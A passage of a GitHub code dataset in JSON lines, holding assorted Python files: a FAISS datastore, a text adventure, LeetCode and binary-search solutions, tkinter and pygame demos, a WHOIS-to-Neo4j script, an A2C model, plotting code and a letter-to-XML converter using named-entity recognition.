index.add(to_add)\n tot += (end-start)\n start = end\n print ('idx=%d finished -- Added %d tokens (%d min)' % (\n i, tot, (time.time()-start_time)/60))\n faiss.write_index(index, index_path)\n print (\"Finish writing index (%dmin)\" % ((time.time()-start_time)/60))\n else:\n start = 0\n while start < self.true_dstore_size:\n end = min(self.true_dstore_size, start + self.num_keys_to_add_at_a_time)\n to_add = self.get_embs(range(start, end)).copy()\n index.add(to_add)\n start = end\n\n if (start % 1000000) == 0:\n print ('Added %d tokens (%d min)' % (start, (time.time()-start_time)/60))\n faiss.write_index(index, index_path)\n\n print (\"Adding total %d keys\" % start)\n print ('Adding took {} s'.format(time.time() - start_time))\n faiss.write_index(index, index_path)\n return index\n\nclass DataStoreUnion(DataStore):\n def __init__(self, setting, **kwargs):\n self.dstores = []\n for _setting in setting.split(\"+\"):\n self.dstores.append(DataStore(setting=_setting, **kwargs))\n self.dimension = self.dstores[0].dimension\n\n def search(self, queries, k):\n all_scores, all_indices = [], []\n for dstore_idx, dstore in enumerate(self.dstores):\n scores, indices = dstore.search(queries, k)\n all_scores.append(scores)\n all_indices.append(indices)\n\n return np.stack(all_scores, 0), np.stack(all_indices, 0)\n\n def get_block_idx_and_token(self, indices, token_only):\n assert token_only # not implemented otherwise\n assert len(indices)==len(self.dstores)\n tokens = None\n for dstore, _indices in zip(self.dstores, indices):\n curr_tokens = dstore.get_block_idx_and_token(_indices, token_only=True)\n if tokens is None:\n tokens = curr_tokens.copy()\n else:\n for i, (_tokens, _curr_tokens) in enumerate(zip(tokens, curr_tokens)):\n tokens[i] += _curr_tokens\n return tokens\n\n def get_embs(self, indices):\n assert len(indices)==len(self.dstores)\n embs = []\n for dstore, _indices in zip(self.dstores, indices):\n embs.append(dstore.get_embs(_indices))\n return embs\n\n\n","repo_name":"facebookresearch/NPM","sub_path":"npm/dstore.py","file_name":"dstore.py","file_ext":"py","file_size_in_byte":23427,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"53"} +{"seq_id":"28810530778","text":"name = \"\"\nname = input(\"Please input your name \\n\").capitalize()\nwhile name == \"\":\n name = input(\"Please input your name \\n\").capitalize() \n\ndef parse_adventure_response(reply):\n reply_lower = reply.lower()\n response_array = reply_lower.split()\n if \"yes\" not in response_array:\n return(\"well this was all a bit pointless...\") \n return (\"Excellent choice! Space cat approves!\")\n\n\nadventure_response = input(\"Welcome {name} Would you like to go on an adventure? (yes/no) \\n\".format(name = name))\nprint(parse_adventure_response(adventure_response))\n\n\n\n# if adventure_response.lower() == \"no\":\n# print (\"Seriously?!? OK have a nice day!\")\n# elif adventure_response.lower() == \"yes\":\n# adventurer = input(\"Great stuff, now choose your character: \\n 1 = Pirate \\n 2 = Space cat \\n\")\n# if adventurer == 1:\n# print(\"good choice, lets go!\")\n# else:\n# print(\"Space cats only sleep they dont go on adventures! :D\")\n\n\n","repo_name":"AlexBerry1983/TextAdventure_codecademy","sub_path":"text_adventure.py","file_name":"text_adventure.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10125720795","text":"\"\"\"Given the root of a binary tree, return the zigzag level order traversal of its nodes' values. (i.e., from left to right, then right to left for the next level and alternate between).\n\n \n\nExample 1:\n\n\nInput: root = [3,9,20,null,null,15,7]\nOutput: [[3],[20,9],[15,7]]\nExample 2:\n\nInput: root = [1]\nOutput: [[1]]\nExample 3:\n\nInput: root = []\nOutput: []\n \n\nConstraints:\n\nThe number of nodes in the tree is in the range [0, 2000].\n-100 <= Node.val <= 100\"\"\"\n\nfrom typing import List\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n if not root:\n return root\n if not root.left and not root.right:\n return [[root.val]]\n self.d = {}\n def zigzag(root, level):\n if not root:\n return\n if level not in self.d.keys():\n self.d[level] = [root.val]\n else:\n if level % 2 == 0:\n self.d[level].append(root.val)\n else:\n self.d[level] = [root.val] + self.d[level]\n zigzag(root.left, level+1)\n zigzag(root.right, level+1)\n zigzag(root, 0)\n return [v for k,v in self.d.items()]\n ","repo_name":"nicokuzak/leetcode","sub_path":"medium/trees/zigzag_level_order_traversal.py","file_name":"zigzag_level_order_traversal.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7034900082","text":"from tkinter import*\nventana=Tk()\nventana.geometry(\"500x300+100+100\")\nventana.title(\"Botones\")\nlblUsuario=Label(text=\"Usuario:\",font=(\"Agency FB\",14)).place(x=10,y=10)\n#CREANDO UN CAMPO DE TEXTO\nentradaU=StringVar()\n#entradaU.set(\"LESH\")\ntxtUsuario=Entry(ventana,textvariable=entradaU).place(x=70,y=20)\nlblUsuario=Label(text=\"Nombre:\",font=(\"Agency FB\",14)).place(x=10,y=50)\nentradaN=StringVar()\n#entradaN.set(\"Luis Enrique Sosa Hernandez\")\ntxtNombre=Entry(ventana,textvariable=entradaN,width=30).place(x=70,y=60)\n# Crear Botones\nbtnSaludar=Button(ventana,text=\"Saludar\",font=(\"Agency FB\",14),width=10).place(x=300,y=20)\nbtnDespedir=Button(ventana,text=\"Despedir\",font=(\"Agency FB\",14),width=10).place(x=300,y=80)\nventana.mainloop()\n","repo_name":"LuisEnriqueSosaHernandez/Python","sub_path":"Botones.py","file_name":"Botones.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15302227677","text":"import os\nimport json\nfrom py2neo import Graph, Node, Relationship\nimport yaml\n\n\ndef whois(data):\n\n try:\n from urllib.request import urlopen\n except ImportError:\n from urllib2 import urlopen\n \n with open('../config.yaml','r') as f:\n conf = yaml.load(f)\n\n domainName = data\n apiKey = conf['whoisData']['apikey']\n\n url = 'https://www.whoisxmlapi.com/whoisserver/WhoisService?'\\\n + 'domainName=' + domainName + '&apiKey=' + apiKey + \"&outputFormat=JSON\"\n\n response = urlopen(url).read().decode('utf8')\n jsonResponse = json.loads(response)\n \n return jsonResponse\n\n\ndef insertWhois(data, graph):\n\n if(data != 0):\n c = Node(\"Whois\", data = data[\"WhoisRecord\"][\"registryData\"][\"registrant\"][\"organization\"])\n ip_node = graph.nodes.match(\"IP\", data=data[\"WhoisRecord\"][\"domainName\"]).first()\n c_node = graph.nodes.match(\"Whois\", data = data[\"WhoisRecord\"][\"registryData\"][\"registrant\"][\"organization\"]).first()\n\n if(c_node):\n rel = Relationship(ip_node, \"HAS_WHOIS\", c_node)\n graph.create(rel)\n print(\"Existing whois node linked\")\n else:\n graph.create(c)\n rel = Relationship(ip_node, \"HAS_WHOIS\", c)\n graph.create(rel)\n print(\"New whois node created and linked\")\n return 1\n else:\n print(\"No whois Entry\")\n return 0\n","repo_name":"CYBEX-P/ti-graph","sub_path":"tiweb/whoisXML.py","file_name":"whoisXML.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74923139049","text":"from urllib.request import Request, urlopen\nfrom urllib.error import URLError, HTTPError\n\nreq = Request(\"http://wfa.uni.wroc.pl/pl/tu-nic-nie-ma\")\n\ntry:\n response = urlopen(req)\nexcept HTTPError as e:\n if e.code == 404:\n print(\"Błąd HTTP:\", e.code, \"- Podana strona nie istnieje\")\n else:\n print(\"Serwer nie mógł spełnić twojego żądania\")\n print(\"Błąd HTTP:\", e.code)\nexcept URLError as e:\n print(\"Nie udało się połączyć z serwerem\")\n print(\"Powód:\", e.reason)\nelse:\n print(\"Podany adres URL jest poprawny oraz dostępny w sieci\")\n","repo_name":"tTargiel/UNI-Python-Programming","sub_path":"Lista 11/zadanie_01.py","file_name":"zadanie_01.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39095815677","text":"import tensorflow as tf\n\ndef sample(probs):\n random_uniform = tf.random_uniform(tf.shape(probs))\n scaled_random_uniform = tf.log(random_uniform) / probs\n return tf.argmax(scaled_random_uniform, axis=1)\n\nclass Model():\n\n def __init__(self, policy, observation_space, action_space, nsteps, learning_rate, decay):\n self.learning_rate = learning_rate\n self.sess = tf.Session()\n\n self.actions = tf.placeholder(tf.int32, [nsteps])\n self.advantage = tf.placeholder(tf.float32, [nsteps])\n self.rewards = tf.placeholder(tf.float32, [nsteps])\n\n self.model = policy(observation_space, action_space)\n\n logits = tf.reduce_sum(tf.one_hot(self.actions, action_space) *\n tf.log(self.model.policy + 1e-13), axis=1)\n\n self.loss_policy = -tf.reduce_mean(self.advantage * logits)\n\n self.loss_value = tf.reduce_mean(tf.squared_difference(self.model.values, self.rewards))\n\n loss = self.loss_policy + self.loss_value\n self.optimizer = tf.train.RMSPropOptimizer(learning_rate=self.learning_rate, decay=decay).minimize(loss)\n\n self.sampled_action = sample(self.model.policy)\n tf.global_variables_initializer().run(session=self.sess)\n\n def predict(self, observation):\n actions, values = self.sess.run([self.sampled_action, self.model.values],\n {self.model.inputs: [observation]})\n return actions[0], values[0]\n\n def predict_value(self, observation):\n return self.sess.run(self.model.values, {self.model.inputs: [observation]})\n\n def train(self, observations, rewards, actions, values):\n advantage = rewards - values\n loss_policy, loss_value, _ = self.sess.run(\n [self.loss_policy, self.loss_value, self.optimizer],\n {\n self.model.inputs: observations,\n self.actions: actions,\n self.advantage: advantage,\n self.rewards: rewards\n }\n )\n return loss_policy, loss_value\n","repo_name":"saschaschramm/A2C","sub_path":"a2c/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74453434406","text":"arr, targets = input('Enter Input : ').split('/')\narr = list(map(int, arr.split(' ')))\ntargets = list(map(int, targets.split(' ')))\n\n\ndef first_less_value(arr, target):\n arr.sort()\n\n low = 0\n high = len(arr) - 1 \n\n ans = -1\n while low <= high:\n mid = low + (high - low)//2\n\n if arr[mid] >= target:\n high = mid - 1\n else:\n ans = mid\n low = mid + 1\n \n if ans == -1:\n return 'No first less value'\n\n return arr[ans]\n\n\n\n\nfor target in targets:\n print(first_less_value(arr, target))","repo_name":"Charonyx/DataStruct2564","sub_path":"Chap10 Searching/firstless.py","file_name":"firstless.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15619639714","text":"import pygame\nimport json\n\npygame.init()\n\n# Definir as cores\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\n# Definir as dimensões da tela\nWIDTH = 800\nHEIGHT = 600\n\n# Inicializar a tela\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Armazenamento de Nome e Pontuação\")\n\n# Carregar o dicionário de jogadores existente do arquivo JSON, se houver\ntry:\n with open(\"players.json\", \"r\") as file:\n players = json.load(file)\nexcept FileNotFoundError:\n players = {}\n\nplayer_name = \"\"\nplayer_score = 0\n\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n # Quando o jogador pressionar Enter, adicionar o nome e pontuação ao dicionário de jogadores\n if player_name:\n players[player_name] = player_score\n with open(\"players.json\", \"w\") as file:\n json.dump(players, file)\n player_name = \"\"\n player_score = 0\n elif event.key == pygame.K_BACKSPACE:\n # Quando o jogador pressionar Backspace, remover o último caractere do nome\n player_name = player_name[:-1]\n elif event.key == pygame.K_UP:\n # Quando o jogador pressionar a seta para cima, aumentar a pontuação\n player_score += 1\n elif event.key == pygame.K_DOWN:\n # Quando o jogador pressionar a seta para baixo, diminuir a pontuação (mínimo de 0)\n player_score = max(0, player_score - 1)\n else:\n # Adicionar o caractere digitado ao nome do jogador\n player_name += event.unicode\n\n screen.fill(BLACK)\n font = pygame.font.Font(None, 36)\n text = font.render(\"Digite seu nome: \" + player_name, True, WHITE)\n text_rect = text.get_rect(center=(WIDTH // 2, HEIGHT // 2 - 50))\n screen.blit(text, text_rect)\n '''\n score_text = font.render(\"Pontuação: \" + str(player_score), True, WHITE)\n score_rect = score_text.get_rect(center=(WIDTH // 2, HEIGHT // 2 + 50))\n screen.blit(score_text, score_rect)\n '''\n pygame.display.flip()\n\npygame.quit()","repo_name":"anaclaramartinelli/ana_lucca_marcos","sub_path":"ranking.py","file_name":"ranking.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74871382246","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\n\n################################\n# Reconstruction visualization #\n################################\n\nimg = cv2.imread(\"large-noise-solid.png\", 0) / 255\npicked_rows = [0, 2, 5, 8]\n\nfig, axes = plt.subplots(len(picked_rows), 3)\nSCALE = 1.2\nfig.set_figheight(5.0 * SCALE)\nfig.set_figwidth(7.0 * SCALE)\nfig.set_tight_layout(True)\n\ndef dstack(img):\n return np.dstack([1 - img] * 3)\n\nfor i, row in enumerate(picked_rows):\n h = 256 + 1\n for j, s, t in [\n (0, slice(0, 514-2), \"Masked input\"),\n (1, slice(514, 514*2-2), \"Reconstruction\"),\n (2, slice(514*2, 514*3-2), \"Ground truth\")\n ]:\n ax = axes[i][j]\n if i == 0:\n ax.set_title(t)\n ax.imshow(dstack(img[h*row:h*(row+1),s]))\n ax.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n ax.tick_params(axis='y', which='both', left=False, right=False, labelleft=False)\n\nplt.savefig(\"reconstructions.pdf\")\nplt.close()\n\nos.system(\"pdfcrop reconstructions.pdf reconstructions.pdf\")\n\n\n#########################\n# Noise size comparison #\n#########################\n\n#from ...code.app.datasets.NoiseGenerator import NoiseGenerator\nimport importlib.util\nspec = importlib.util.spec_from_file_location(\n \"app.datasets\",\n \"../../code/app/datasets/NoiseGenerator.py\"\n)\nfoo = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(foo)\nNoiseGenerator = foo.NoiseGenerator\n\n\ngen = NoiseGenerator(42, 28.75*2, 0.25, True)\n\nimg = cv2.imread(\"large-noise-solid.png\", 0)[257*2:257*3-1,513*2+4:-2] / 255\n\nsmall_noise, _ = NoiseGenerator(42, 28.75*0.25, 0.25, True)._create_random_noise_mask(*img.shape)\nstandard_noise, _ = NoiseGenerator(42, 28.75*2, 0.25, True)._create_random_noise_mask(*img.shape)\nbig_noise, _ = NoiseGenerator(43, 28.75*6, 0.25, True)._create_random_noise_mask(*img.shape)\n\nnoises = [small_noise, standard_noise, big_noise]\nnoise_names = [\"Small\", \"Medium\", \"Large\"]\n\nfig, axes = plt.subplots(2, 3)\nSCALE = 1.0\nfig.set_figheight(4.0 * SCALE)\nfig.set_figwidth(10.0 * SCALE)\nfig.set_tight_layout(True)\n\nfor i, ax in enumerate(axes[0]):\n # ax.axis(\"off\")\n ax.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n ax.tick_params(axis='y', which='both', left=False, right=False, labelleft=False)\n ax.set_title(noise_names[i])\n ax.imshow(np.dstack([noises[i]] * 3))\n\nfor i, ax in enumerate(axes[1]):\n # ax.axis(\"off\")\n ax.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n ax.tick_params(axis='y', which='both', left=False, right=False, labelleft=False)\n ax.imshow(np.dstack([1 - img * noises[i]] * 3))\n\n#plt.axes(\"off\")\n#plt.show()\n\nplt.savefig(\"noise-comparison.pdf\")\nplt.close()\n\nos.system(\"pdfcrop noise-comparison.pdf noise-comparison.pdf\")\n","repo_name":"Jirka-Mayer/MasterThesis","sub_path":"figures/06-noise/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"38276705341","text":"\n\"\"\"\nTransforms the path of the transcoded file from one base directory\nto another. Not useful for the standard transcode operation, but\nnecessary when moving the USB mount point from one computer to\nanother.\n\"\"\"\n\n_TRANSCODE_ORIGINAL_BASE = None\n_TRANSCODE_TRANSFORM_BASE = None\n\n\ndef tform_tcode(original_transcode_file):\n \"\"\"\n Transform the database stored transcoded filename into the local\n filename.\n \"\"\"\n assert isinstance(original_transcode_file, str)\n if _TRANSCODE_ORIGINAL_BASE is None or _TRANSCODE_TRANSFORM_BASE is None:\n return original_transcode_file\n\n if not original_transcode_file.startswith(_TRANSCODE_ORIGINAL_BASE):\n return original_transcode_file\n return _TRANSCODE_TRANSFORM_BASE + original_transcode_file[len(_TRANSCODE_ORIGINAL_BASE):]\n\n\ndef reverse_tcode(current_transcode_file):\n \"\"\"\n Transform the local transcoded filename into the database stored\n transcoded filename.\n \"\"\"\n assert isinstance(current_transcode_file, str)\n if _TRANSCODE_ORIGINAL_BASE is None or _TRANSCODE_TRANSFORM_BASE is None:\n return current_transcode_file\n\n if not current_transcode_file.startswith(_TRANSCODE_TRANSFORM_BASE):\n return current_transcode_file\n return _TRANSCODE_ORIGINAL_BASE + current_transcode_file[len(_TRANSCODE_TRANSFORM_BASE):]\n\n\ndef set_transcode_transform(original_base, transform_base):\n \"\"\"\n Set the path transformation used for the transcoded filenames.\n \"\"\"\n assert isinstance(original_base, str) and len(original_base) > 0\n assert isinstance(transform_base, str) and len(transform_base) > 0\n\n if original_base.endswith('/') or original_base.endswith('\\\\'):\n assert transform_base.endswith('/') or transform_base.endswith('\\\\')\n\n global _TRANSCODE_ORIGINAL_BASE\n _TRANSCODE_ORIGINAL_BASE = original_base\n global _TRANSCODE_TRANSFORM_BASE\n _TRANSCODE_TRANSFORM_BASE = transform_base\n\n\n_SOURCE_ORIGINAL_BASE = None\n_SOURCE_TRANSFORM_BASE = None\n\n\ndef tform_src(original_src_file):\n \"\"\"\n Transform the database stored source filename into the local\n filename.\n \"\"\"\n assert isinstance(original_src_file, str)\n if _SOURCE_ORIGINAL_BASE is None or _SOURCE_TRANSFORM_BASE is None:\n return original_src_file\n\n if not original_src_file.startswith(_SOURCE_ORIGINAL_BASE):\n return original_src_file\n return _SOURCE_TRANSFORM_BASE + original_src_file[len(_SOURCE_ORIGINAL_BASE):]\n\n\ndef reverse_source(current_source_file):\n \"\"\"\n Transform the local source filename into the database stored\n source filename.\n \"\"\"\n assert isinstance(current_source_file, str)\n if _SOURCE_ORIGINAL_BASE is None or _SOURCE_TRANSFORM_BASE is None:\n return current_source_file\n\n if not current_source_file.startswith(_SOURCE_TRANSFORM_BASE):\n return current_source_file\n return _SOURCE_ORIGINAL_BASE + current_source_file[len(_SOURCE_TRANSFORM_BASE):]\n\n\ndef set_source_transform(original_base, transform_base):\n \"\"\"\n Set the path transformation used for the source filenames.\n \"\"\"\n assert isinstance(original_base, str) and len(original_base) > 0\n assert isinstance(transform_base, str) and len(transform_base) > 0\n\n if original_base.endswith('/') or original_base.endswith('\\\\'):\n assert transform_base.endswith('/') or transform_base.endswith('\\\\')\n\n global _SOURCE_ORIGINAL_BASE\n _SOURCE_ORIGINAL_BASE = original_base\n global _SOURCE_TRANSFORM_BASE\n _SOURCE_TRANSFORM_BASE = transform_base\n","repo_name":"groboclown/music-uploader","sub_path":"convertmusic/transform_db_path.py","file_name":"transform_db_path.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34758785215","text":"import os\nimport pandas as pd\nfrom datetime import datetime\nimport calendar\nimport re\nfrom flair.data import Sentence\nfrom flair.models import SequenceTagger\nfrom flair.nn import Classifier\nfrom flair.data import Label\nfrom bertopic import BERTopic\nimport itertools\n\n\n\"\"\" Create letters as xml files\n\"\"\"\n\ndef load_letters_from_file(file):\n with open(file, 'r', encoding='utf8') as f:\n # split file into letters using '#' as delimitor\n letters = f.read().split('#')\n split_letters = []\n # for each item in letters list, extract text, metadata insinde '{}' and normalised text inside '[[]]' as sublist\n for letter in letters:\n braces_content = re.findall(r\"(\\{.*?\\})\", letter) # content between braces\n brackets_content = re.findall(r\"\\[\\[(.*?)\\]\\]\", letter, re.DOTALL) # content between brackets\n\n # remove content between braces and brackets from original string\n remaining_text = re.sub(r\"(\\{.*?\\})\", \"\", letter, flags=re.DOTALL)\n remaining_text = re.sub(r\"\\[\\[(.*?)\\]\\]\", \"\", remaining_text, flags=re.DOTALL)\n \n\n # append extracted content to split_items list\n split_letters.append([braces_content[0] if braces_content else \"\", \n brackets_content[0] if brackets_content else \"\", \n remaining_text.strip()])\n\n return split_letters\n\n\ndef save_letter(letter, id):\n with open(os.path.join(os.getcwd(), '..', 'data', 'letters', f'{id}.xml'), 'w', encoding='utf8') as f:\n f.write(letter)\n\ndef string_to_dict(input_string):\n # Remove the braces and split the string into key-value pairs\n pairs = input_string.replace(\"{\", \"\").replace(\"}\", \"\").split(\";\")\n # Split each pair into a key and value and strip whitespace\n pairs = [pair.split(\":\") for pair in pairs if pair.strip()]\n # Create a dictionary from the pairs\n dictionary = {key.strip(): value.strip() for key, value in pairs}\n return dictionary\n\ndef query_gpt(prompt, string):\n # TODO\n answer = \"Todo\"\n return answer\n\ndef named_entity_recognition(letter):\n\n # NER using Flair\n # load model\n tagger = Classifier.load('de-ner-large')\n tagger.to('cpu')\n \n # make example sentence in any of the four languages\n sentence = Sentence(letter)\n\n # predict NER tags\n tagger.predict(sentence)\n\n list_of_entities = []\n\n # print predicted NER spans\n for entity in sentence.get_spans('ner'):\n tag: Label = entity.labels[0]\n #print(f'{entity.text} [{tag.value}] ({tag.score:.4f})')\n list_of_entities.append([entity.text, tag.value])\n \n return list_of_entities\n\n\"\"\"\ndef topic_extraction(letters):\n # Creating the BERTopic model\n topic_model = BERTopic(language=\"german\", \n calculate_probabilities=True, \n embedding_model=\"deepset/bert-base-german-cased-oldvocab\")\n\n # Fit the model on your letters\n topics, _ = topic_model.fit_transform(letters)\n\n # Get the topics for each letter\n letter_topics = [topic_model.get_topic(topic) for topic in topics]\n print(letter_topics)\n\"\"\"\n\n# Function to create a reference based on entity type\ndef create_reference(entity, unique_persons, unique_places):\n if entity[1] == 'PER':\n normalized_name = re.sub(r'\\b\\w+\\.','',entity[0])\n normalized_name = re.sub('\\s+',' ', normalized_name)\n normalized_name = ' '.join(normalized_name.split(' '))\n normalized_names = normalized_name.split(' ')\n if len(normalized_names) > 1:\n normalized_name = normalized_names[-1]\n\n if len(normalized_name) < 3:\n return None, None\n elif len(normalized_name) == 3 and (normalized_name == 'von' or normalized_name == 'vom'):\n return None, None\n elif normalized_name.isspace():\n return None, None\n elif normalized_name == '\\n':\n return None, None\n\n print(normalized_name)\n\n\n is_present = unique_persons['PersonName'].str.contains(normalized_name)\n filtered_df = unique_persons[is_present]\n if not filtered_df.empty:\n person_name = filtered_df['PersonName'].iloc[0] \n person_id = filtered_df['person_id'].iloc[0] \n ref = f'../register/lassberg-persons.xml#{person_id}'\n return ref, person_name\n elif entity[1] == 'LOC':\n is_present = unique_places['Ort'].str.contains(entity[0])\n filtered_df = unique_places[is_present]\n if not filtered_df.empty:\n place_id = filtered_df['place_id'].iloc[0]\n place_name = filtered_df['Ort'].iloc[0] \n ref = f'../register/lassberg-places.xml#{place_id}'\n return ref, place_name\n return None, None\n\n\ndef create_letter(letters, xml_template):\n # read in xml template as string\n with open(xml_template, 'r', encoding='utf8') as f:\n xml_template = f.read()\n #print(xml_template)\n\n # read in register.csv as dataframe\n register = pd.read_csv(os.path.join(os.getcwd(), '..', 'data', 'register', 'register.csv'), sep=';')\n\n # read in unique_places.csv as dataframe\n unique_places = pd.read_csv(os.path.join(os.getcwd(), '..', 'data', 'register', 'unique_places.csv'), sep=';')\n\n # read in unique_persons.csv as dataframe\n unique_persons = pd.read_csv(os.path.join(os.getcwd(), '..', 'data', 'register', 'unique_persons.csv'), sep=';')\n\n for letter in letters:\n try:\n xml_file = xml_template\n # extract metadata from braces as dictionary\n metadata = string_to_dict(letter[0])\n # get additionaL metadata from register.csv by marching metadata[\"ID\"] with register[\"ID\"] and safe as new df\n metadata_df = register[register['ID'] == metadata['ID']]\n # get item with metadata_df[\"place_id\"].values[0]\n place_from_metadata = unique_places[unique_places['place_id'] == metadata_df[\"place_id\"].values[0]]\n\n # replace placeholders in xml template with content from letters list\n # replace xml:id\n xml_file = xml_file.replace('xml:id=\"lassberg-letter-{XML_ID}\"', f'xml:id=\"{metadata[\"ID\"]}\"')\n xml_file = xml_file.replace('{XML_ID}', f'{metadata[\"ID\"]}')\n # get date from metadata\n date = metadata_df['Datum'].values[0]\n # replace {SENT_DATE_ISO}\n xml_file = xml_file.replace('{SENT_DATE_ISO}', date)\n # format date from yyy-mm-dd to dd.mm.yyyy\n date = datetime.strptime(date, '%Y-%m-%d').strftime('%d.%m.%Y')\n xml_file = xml_file.replace('{SENT_DATE}', date)\n # determine if letter was send to or from Lassberg\n if metadata_df['VON/AN'].values[0] == 'VON':\n xml_file = xml_file.replace('{SENT_BY}','Joseph von Laßberg')\n xml_file = xml_file.replace('{SENT_TO}', metadata_df['Name'].values[0])\n xml_file = xml_file.replace('{PERS_TO_NUMBER}\\\" ref=\\\"{GND}\\\"', f'{metadata_df[\"person_id\"].values[0]}\\\" ref=\\\"https://d-nb.info/gnd/{metadata_df[\"GND\"].values[0]}\\\"')\n xml_file = xml_file.replace('{PERS_FROM_NUMBER}\\\" ref=\\\"{GND}\\\"', f'lassberg-correspondent-0373\\\" ref=\\\"https://d-nb.info/gnd/118778862\\\"')\n xml_file = xml_file.replace('{PLACE_SENT_FROM}', f'{place_from_metadata[\"Ort\"].values[0]}')\n xml_file = xml_file.replace('{PLACE_SENT_TO}', '')\n sent_from = 'Joseph von Laßberg'\n sent_to = metadata_df['Name'].values[0]\n\n else:\n xml_file = xml_file.replace('{SENT_TO}','Joseph von Laßberg')\n xml_file = xml_file.replace('{SENT_BY}', metadata_df['Name'].values[0])\n xml_file = xml_file.replace('{PERS_FROM_NUMBER}\\\" ref=\\\"{GND}\\\"', f'{metadata_df[\"person_id\"].values[0]}\\\" ref=\\\"https://d-nb.info/gnd/{metadata_df[\"GND\"].values[0]}\\\"')\n xml_file = xml_file.replace('{PERS_TO_NUMBER}\\\" ref=\\\"{GND}\\\"', f'lassberg-correspondent-0373\\\" ref=\\\"https://d-nb.info/gnd/118778862\\\"')\n xml_file = xml_file.replace('{PLACE_SENT_FROM}', '')\n xml_file = xml_file.replace('{PLACE_SENT_TO}', f'{place_from_metadata[\"Ort\"].values[0]}')\n sent_to = 'Joseph von Laßberg'\n sent_from = metadata_df['Name'].values[0]\n\n # replace {REPOSITORY_PLACE}, {REPOSITORY_INSTITUTION}, {REPOSITORY_SIGNATURE}, {REGISTER_HARRIS}, {REGISTER_LASSBERG}, {PRINTED_IN}, {PRINTED_IN_URL} with value from metadata_df\n xml_file = xml_file.replace('{REPOSITORY_PLACE}', str(metadata_df['Aufbewahrungsort'].values[0]))\n xml_file = xml_file.replace('{REPOSITORY_INSTITUTION}', str(metadata_df['Aufbewahrungsinstitution'].values[0]))\n xml_file = xml_file.replace('{REPOSITORY_SIGNATURE}', '')\n xml_file = xml_file.replace('{REGISTER_HARRIS}', str(metadata_df['Nummer_Harris'].values[0]))\n xml_file = xml_file.replace('{REGISTER_LASSBERG}', str(metadata_df['Journalnummer'].values[0]))\n xml_file = xml_file.replace('{PRINTED_IN}', str(metadata_df['text'].values[0]))\n xml_file = xml_file.replace('{PRINTED_IN_URL}', str(metadata_df['url'].values[0]))\n\n # add abstract German and English\n abstract_en = query_gpt(\"Summarize the following letter sent from {sent_from} to {SENT_TO} in English: \", letter[1])\n xml_file = xml_file.replace('{ABSTRACT_ENGLISH}', abstract_en)\n abstract_de = query_gpt(\"Summarize the following letter sent from {sent_from} to {SENT_TO} in German: \", letter[1])\n xml_file = xml_file.replace('{ABSTRACT_GERMAN}', abstract_de)\n\n original_text = letter[2]\n normalized_text = letter[1]\n\n list_of_entities_normalized = named_entity_recognition(normalized_text)\n list_of_entities_original = named_entity_recognition(original_text)\n #print(list_of_entities_original)\n #print(list_of_entities_normalized)\n\n # Removing duplicates when order doesn't matter\n list_of_entities_normalized = list(k for k,_ in itertools.groupby(sorted(list_of_entities_normalized)))\n list_of_entities_original = list(k for k,_ in itertools.groupby(sorted(list_of_entities_original)))\n\n print(list_of_entities_normalized)\n print(list_of_entities_original)\n\n\n list_of_mentioned_entities = []\n\n # put entities into element in xml file\n for entity in list_of_entities_normalized:\n\n\n ref, entity_name = create_reference(entity, unique_persons, unique_places)\n if ref:\n pass\n #print(ref, entity_name)\n else:\n ref=\"\"\n\n normalized_text = normalized_text.replace(entity[0], f'{str(entity[0])[:1] + \"#+#\" + str(entity[0])[1:]}')\n normalized_text = normalized_text.replace('MISC', 'misc')\n normalized_text = normalized_text.replace('PER','person')\n normalized_text = normalized_text.replace('LOC','place')\n normalized_text = normalized_text.replace('ORG','organisation')\n\n \"\"\"\n\n ref_element = f'{entity[0]}'\n ref_element = ref_element.replace('PER', 'Person')\n ref_element = ref_element.replace('LOC', 'Place')\n ref_element = ref_element.replace('ORG', 'Organisation')\n ref_element = ref_element.replace('MISC', 'Bibl')\n\n list_of_mentioned_entities.append(ref_element)\n\n \"\"\"\n\n normalized_text = normalized_text.replace('#+#','')\n\n list_of_mentioned_entities = list(set(list_of_mentioned_entities)) \n\n\n\n for entity in list_of_entities_original:\n ref, entity_name = create_reference(entity, unique_persons, unique_places)\n if ref:\n print(ref, entity_name)\n 